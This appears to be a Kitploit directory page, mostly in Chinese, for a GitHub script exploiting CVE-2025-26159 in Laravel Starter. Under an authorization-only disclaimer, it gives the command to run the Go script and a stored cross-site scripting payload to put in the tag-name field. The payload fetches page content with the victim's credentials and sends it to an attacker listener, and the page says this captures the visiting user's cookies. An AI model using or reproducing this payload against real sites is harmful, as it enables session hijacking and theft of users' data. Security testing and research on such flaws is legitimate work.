Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-26159 — This script decodes, filters, and extracts cookies as part of the exploitation of CVE-2025-26159. | Kitploit
工具/GitHubGitHub/godbadtry/cve-2025-26159
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubgodbadtry/cve-2025-26159

CVE-2025-26159

This script decodes, filters, and extracts cookies as part of the exploitation of CVE-2025-26159.

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-26159

此脚本仅可用于已获得明确授权的授权环境。作者对因使用此脚本而产生的任何滥用、损害或后果概不负责。

该脚本解码、过滤并提取Cookie,作为利用CVE-2025-26159的一部分。

使用方法

要了解利用步骤,请查看我博客上的这篇文章。

root@kitploit:~
go run CVE-2025-26159.go

在Laravel Starter的标签名字段中添加以下payload:

root@kitploit:~
<script>fetch("/",{credentials:"include"}).then(r=>r.text()).then(d=>location='//127.1:9000/d='+escape(d))</script>

当用户访问恶意标签的详情页面后,你将获取到他的Cookie。

下载工具